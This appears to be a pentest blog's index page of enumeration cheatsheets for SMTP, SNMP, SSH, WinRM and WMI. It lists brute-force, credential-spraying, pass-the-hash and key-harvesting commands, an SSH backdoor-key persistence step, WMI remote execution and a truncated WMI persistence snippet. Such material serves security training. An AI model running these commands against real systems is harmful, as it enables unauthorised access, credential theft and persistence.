auxiliary/scanner/smb/smb_ms17_010 # SMBGhost check nmap -p 445 --script smb-vuln-cve2020-0796 <ip> use auxiliary/scanner/smb/cve_2020_0796_smbghost

3 min · d3vilsec

SMTP

SMTP Enumeration Cheatsheet Default Ports: 25 (SMTP), 587 (Submission/STARTTLS), 465 (SMTPS) Banner Grabbing nc -nv <ip> 25 telnet <ip> 25 openssl s_client -starttls smtp -connect <ip>:587 openssl s_client -connect <ip>:465 Manual SMTP Commands HELO <domain> # Basic hello EHLO <domain> # Extended hello (lists capabilities) AUTH LOGIN # Start base64 auth AUTH PLAIN # Plain auth VRFY <user> # Verify if user exists EXPN <list> # Expand mailing list members RCPT TO:<user@domain> # Verify recipient (within MAIL flow) MAIL FROM:<[email protected]> RCPT TO:<target@domain> DATA # Begin message body . # End message (single dot on its own line) RSET # Reset connection state QUIT Capabilities Enumeration # See what the server supports after EHLO nc <ip> 25 EHLO test.com # Common capabilities to note: # STARTTLS, AUTH LOGIN/PLAIN/NTLM, SIZE, PIPELINING, VRFY, EXPN User Enumeration # smtp-user-enum tool smtp-user-enum -M VRFY -U users.txt -t <ip> smtp-user-enum -M EXPN -U users.txt -t <ip> smtp-user-enum -M RCPT -U users.txt -t <ip> -D <domain> # Manual VRFY loop for user in $(cat users.txt); do echo VRFY $user | nc -nv -w 1 <ip> 25 2>/dev/null | grep "^250" done # Response codes: # 250 = user exists # 252 = can't verify but will attempt delivery # 550 = user does not exist Nmap Scripts nmap -p 25 --script smtp-commands <ip> nmap -p 25 --script smtp-enum-users <ip> nmap -p 25 --script smtp-open-relay <ip> nmap -p 25 --script smtp-brute <ip> nmap -p 25 --script smtp-ntlm-info <ip> # Windows NTLM info leak nmap -p 25 --script smtp-vuln-cve2010-4344 <ip> # Exim heap overflow nmap -p 25,587,465 --script smtp-* <ip> Open Relay Testing nc <ip> 25 EHLO test.com MAIL FROM:<[email protected]> RCPT TO:<[email protected]> # If accepted = open relay! DATA Subject: relay test This is a test. . QUIT # Automated nmap -p 25 --script smtp-open-relay \ --script-args [email protected],[email protected] <ip> Metasploit use auxiliary/scanner/smtp/smtp_version use auxiliary/scanner/smtp/smtp_enum use auxiliary/scanner/smtp/smtp_relay NTLM Info Leak (Windows SMTP) # Triggers Windows SMTP servers to reveal hostname, domain, OS version nmap -p 25 --script smtp-ntlm-info <ip> # Manual nc <ip> 25 EHLO test AUTH NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= # Decode the Base64 response with ntlmdecoder or responder Useful Wordlists /usr/share/seclists/Usernames/top-usernames-shortlist.txt /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

2 min · d3vilsec

SNMP

SNMP Enumeration Cheatsheet Default Ports: 161 (UDP — queries), 162 (UDP — traps) SNMP Versions Version Auth Notes v1 Community string Cleartext, oldest v2c Community string Cleartext, most common v3 Username + auth + encryption Secure, rarely misconfigured Detection nmap -sU -p 161 <ip> nmap -sU -p 161 -sV <ip> nmap -sU -p 161 --script snmp-info <ip> Community String Brute Force # onesixtyone (fast UDP brute) onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <ip> onesixtyone -c community.txt -i ips.txt # Nmap nmap -sU -p 161 --script snmp-brute <ip> nmap -sU -p 161 --script snmp-brute \ --script-args snmp-brute.communitiesdb=communities.txt <ip> # Metasploit use auxiliary/scanner/snmp/snmp_login set RHOSTS <ip> run snmpwalk — Walking the MIB Tree # Full walk (v1/v2c) snmpwalk -v1 -c public <ip> snmpwalk -v2c -c public <ip> # Target specific OIDs snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.1 # System info snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.25.4.2 # Running processes snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.25.6.3 # Installed software snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.6.13.1.3 # Open TCP ports snmpwalk -v2c -c public <ip> 1.3.6.1.4.1.77.1.2.25 # Windows user accounts snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.2.2 # Network interfaces # SNMPv3 snmpwalk -v3 -u <user> -l AuthPriv \ -a MD5 -A <authpass> -x DES -X <privpass> <ip> snmpget — Single OID Query snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.1.0 # sysDescr snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.5.0 # sysName (hostname) snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.6.0 # sysLocation snmp-check snmp-check <ip> snmp-check <ip> -c public snmp-check <ip> -c public -v 2c braa — Bulk SNMP braa public@<ip>:.1.3.6.* braa [email protected]:.1.3.6.1.2.1.1.1.0 Nmap SNMP Scripts nmap -sU -p 161 --script snmp-info <ip> nmap -sU -p 161 --script snmp-sysdescr <ip> nmap -sU -p 161 --script snmp-interfaces <ip> nmap -sU -p 161 --script snmp-processes <ip> nmap -sU -p 161 --script snmp-win32-users <ip> nmap -sU -p 161 --script snmp-win32-services <ip> nmap -sU -p 161 --script snmp-win32-software <ip> nmap -sU -p 161 --script snmp-* <ip> Key OIDs Reference OID Description 1.3.6.1.2.1.1.1.0 System description 1.3.6.1.2.1.1.3.0 System uptime 1.3.6.1.2.1.1.5.0 Hostname 1.3.6.1.2.1.1.6.0 System location 1.3.6.1.2.1.25.1.6.0 Running OS processes 1.3.6.1.2.1.25.4.2.1.2 Process names 1.3.6.1.2.1.25.6.3.1.2 Installed packages 1.3.6.1.4.1.77.1.2.25 Windows user accounts 1.3.6.1.2.1.6.13.1.3 TCP open ports 1.3.6.1.2.1.2.2.1.2 Interface names 1.3.6.1.2.1.2.2.1.11 Interface in-packets Common Community Strings public private manager community snmp cisco monitor 0 internal

2 min · d3vilsec

SSH

SSH Enumeration Cheatsheet Default Port: 22 (TCP) Banner & Info Gathering nc -nv <ip> 22 # Banner grab ssh -v <user>@<ip> # Verbose handshake output ssh -V # Local SSH client version # Nmap scripts nmap -p 22 -sV <ip> nmap -p 22 --script ssh-hostkey <ip> nmap -p 22 --script ssh2-enum-algos <ip> nmap -p 22 --script ssh-auth-methods \ --script-args ssh.user=<user> <ip> nmap -p 22 --script sshv1 <ip> # Check for insecure SSHv1 ssh-audit (Configuration Security Check) ssh-audit <ip> ssh-audit <ip> -p 22 # Flags to note: # [fail] = critical issue # [warn] = should be fixed # Lists: KEX, hostkey, encryption, MAC algorithms User Enumeration # CVE-2018-15473 (OpenSSH < 7.7 username enumeration) python3 ssh_user_enum.py --userList users.txt --ip <ip> # Metasploit use auxiliary/scanner/ssh/ssh_enumusers set RHOSTS <ip> set USER_FILE users.txt run Brute Force # Hydra hydra -l <user> -P wordlist.txt ssh://<ip> hydra -L users.txt -P wordlist.txt ssh://<ip> hydra -l <user> -P wordlist.txt -s 2222 ssh://<ip> # Custom port # Medusa medusa -h <ip> -u <user> -P wordlist.txt -M ssh # Nmap nmap -p 22 --script ssh-brute <ip> nmap -p 22 --script ssh-brute \ --script-args userdb=users.txt,passdb=pass.txt <ip> # Metasploit use auxiliary/scanner/ssh/ssh_login set RHOSTS <ip> set USERNAME <user> set PASS_FILE wordlist.txt run Key-Based Attacks # Connect with private key ssh -i id_rsa <user>@<ip> chmod 600 id_rsa && ssh -i id_rsa <user>@<ip> # Crack passphrase on private key ssh2john id_rsa > ssh_hash.txt john ssh_hash.txt --wordlist=wordlist.txt hashcat -m 22921 ssh_hash.txt wordlist.txt # Ed25519 hashcat -m 22911 ssh_hash.txt wordlist.txt # RSA # Scan for keys (key harvesting after initial access) find / -name "id_rsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null find / -name "*.pem" -o -name "*.key" 2>/dev/null SSH Key Scanning # Collect host keys ssh-keyscan <ip> ssh-keyscan -t rsa,ecdsa,ed25519 <ip> ssh-keyscan -p 2222 <ip> # Scan range ssh-keyscan -f hosts.txt > known_hosts Interesting Files to Grab Post-Access ~/.ssh/id_rsa # Private key ~/.ssh/id_rsa.pub # Public key ~/.ssh/authorized_keys # Authorized keys (add yours for persistence) ~/.ssh/known_hosts # Previous connections (network map) /etc/ssh/sshd_config # Server configuration /etc/ssh/ssh_host_rsa_key # Host private key Add Backdoor SSH Key (Post-Exploitation) # On attacker machine ssh-keygen -t rsa -b 4096 -f backdoor # On target (append to authorized_keys) echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys # Connect back ssh -i backdoor <user>@<ip> Common Misconfigurations to Check PermitRootLogin yes — Root login allowed PasswordAuthentication yes — Passwords accepted (brutable) PermitEmptyPasswords yes — Blank passwords allowed AuthorizedKeysFile .ssh/authorized_keys — Key auth path AllowUsers / DenyUsers — User restrictions Port 22 — Non-standard port may indicate stealth

2 min · d3vilsec

WinRM

WinRM Enumeration Cheatsheet Default Ports: 5985 (HTTP / WS-Management), 5986 (HTTPS) What is WinRM? Windows Remote Management — Microsoft’s implementation of WS-Management. Used for remote PowerShell, remote command execution, and administration. Detection nmap -p 5985,5986 <ip> nmap -p 5985,5986 -sV <ip> curl -s http://<ip>:5985/wsman curl -sk https://<ip>:5986/wsman Evil-WinRM # Password auth (HTTP) evil-winrm -i <ip> -u <user> -p <pass> # SSL (HTTPS, port 5986) evil-winrm -i <ip> -u <user> -p <pass> -S # Pass-the-Hash (NTLM) evil-winrm -i <ip> -u <user> -H <nthash> # With scripts and executables directory evil-winrm -i <ip> -u <user> -p <pass> \ -s /path/to/ps1_scripts/ \ -e /path/to/executables/ # Within evil-winrm shell menu # Show built-in commands upload /local/file.exe # Upload file download C: ile.txt # Download file Invoke-Binary /local/exe # Run local exe in memory bypass_uac # UAC bypass CrackMapExec # Test credentials crackmapexec winrm <ip> -u <user> -p <pass> crackmapexec winrm 192.168.1.0/24 -u <user> -p <pass> # Credential spray crackmapexec winrm <ip> -u users.txt -p <pass> crackmapexec winrm <ip> -u <user> -p wordlist.txt # Pass-the-Hash crackmapexec winrm <ip> -u <user> -H <nthash> # Execute commands crackmapexec winrm <ip> -u <user> -p <pass> -x 'whoami' # CMD crackmapexec winrm <ip> -u <user> -p <pass> -X 'whoami' # PowerShell crackmapexec winrm <ip> -u <user> -p <pass> -X 'Get-Process' PowerShell / Windows Native # Test WinRM connectivity Test-WSMan -ComputerName <ip> Test-WSMan -ComputerName <ip> -UseSSL # Interactive remote session Enter-PSSession -ComputerName <ip> -Credential <user> Enter-PSSession -ComputerName <ip> -UseSSL -Credential <user> # Non-interactive / scripted $cred = Get-Credential $sess = New-PSSession -ComputerName <ip> -Credential $cred Invoke-Command -Session $sess -ScriptBlock { whoami; hostname } Invoke-Command -ComputerName <ip> -Credential $cred -ScriptBlock { ipconfig } # Copy files over WinRM Copy-Item -Path C:\local ile.exe -Destination C: emote\ -ToSession $sess Copy-Item -Path C: emote\loot.txt -Destination C:\local\ -FromSession $sess impacket # winrm_exec (alternative) python3 winrm_exec.py <domain>/<user>:<pass>@<ip> Brute Force crackmapexec winrm <ip> -u <user> -p wordlist.txt hydra -l <user> -P wordlist.txt <ip> -s 5985 http-post-form \ "/wsman:Username=^USER^&Password=^PASS^:401" Common Scenarios Pwned user is in group: "Remote Management Users" → Can use WinRM "Administrators" → Full access via WinRM Check group membership: net localgroup "Remote Management Users" Key Facts Requires user to be in Remote Management Users or Administrators group Can be enabled with: Enable-PSRemoting -Force Firewall rule: WinRM-HTTP-In-TCP (port 5985) Often enabled on Domain Controllers and management servers

2 min · d3vilsec

WMI

WMI Enumeration Cheatsheet Default Ports: 135 (DCOM endpoint mapper), dynamic high ports (TCP 49152–65535) What is WMI? Windows Management Instrumentation — a core Windows API for querying system state and executing code remotely. Uses DCOM over RPC. Detection nmap -p 135 <ip> nmap -p 135 -sV <ip> nmap -p 135 --script msrpc-enum <ip> impacket — wmiexec.py # Interactive shell python3 wmiexec.py <domain>/<user>:<pass>@<ip> # Single command python3 wmiexec.py <domain>/<user>:<pass>@<ip> "whoami" python3 wmiexec.py <domain>/<user>:<pass>@<ip> "ipconfig /all" # Pass-the-Hash python3 wmiexec.py -hashes :<nthash> <domain>/<user>@<ip> python3 wmiexec.py -hashes <lmhash>:<nthash> <domain>/<user>@<ip> # Without domain (local account) python3 wmiexec.py ./<user>:<pass>@<ip> CrackMapExec crackmapexec wmi <ip> -u <user> -p <pass> crackmapexec wmi <ip> -u <user> -p <pass> -x 'whoami' crackmapexec wmi <ip> -u <user> -H <nthash> crackmapexec wmi 192.168.1.0/24 -u <user> -p <pass> PowerShell WMI (Local & Remote) # Local system queries Get-WmiObject -Class Win32_OperatingSystem Get-WmiObject -Class Win32_ComputerSystem Get-WmiObject -Class Win32_Process Get-WmiObject -Class Win32_UserAccount Get-WmiObject -Class Win32_Group Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Where IPAddress -ne $null Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" } Get-WmiObject -Class Win32_Product # Installed software (slow) Get-WmiObject -Class Win32_LogicalDisk Get-WmiObject -Class Win32_StartupCommand # Startup items # Modern equivalent (CIM) Get-CimInstance -ClassName Win32_OperatingSystem Get-CimInstance -ClassName Win32_Process # Remote queries $cred = Get-Credential Get-WmiObject -Class Win32_OperatingSystem -ComputerName <ip> -Credential $cred Get-WmiObject -Class Win32_Process -ComputerName <ip> -Credential $cred PowerShell WMI Remote Code Execution # Execute command via WMI (leaves process behind) $cred = Get-Credential Invoke-WmiMethod -Class Win32_Process -Name Create ` -ArgumentList "cmd.exe /c whoami > C:\output.txt" ` -ComputerName <ip> -Credential $cred # Check output Get-WmiObject -Class CIM_DataFile -Filter "Name='C:\output.txt'" ` -ComputerName <ip> -Credential $cred wmic (Legacy CLI — Windows) :: Local wmic os get Caption,Version,BuildNumber wmic process list brief wmic useraccount list brief wmic group list brief wmic service where "State='Running'" list brief wmic product get Name,Version :: Installed software wmic startupinfo list full :: Remote wmic /node:<ip> /user:<user> /password:<pass> os get Caption wmic /node:<ip> /user:<user> /password:<pass> process call create "cmd.exe /c whoami > C:\out.txt" wmic /node:<ip> /user:<user> /password:<pass> useraccount list brief WQL Queries # WQL = WMI Query Language (SQL-like) Get-WmiObject -Query "SELECT * FROM Win32_Process WHERE Name='lsass.exe'" Get-WmiObject -Query "SELECT * FROM Win32_Service WHERE StartMode='Auto' AND State='Stopped'" Get-WmiObject -Query "SELECT * FROM Win32_UserAccount WHERE LocalAccount=True" Metasploit use exploit/windows/smb/psexec # Uses WMI/DCOM under the hood use exploit/windows/local/wmi # Post-exploitation WMI persistence use auxiliary/scanner/winrm/winrm_wql # WQL via WinRM WMI Persistence (Post-Exploitation) # Create permanent WMI event subscription (fileless persistence) $filter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{ Name = "PentestFilter" EventNameSpace = "root

2 min · d3vilsec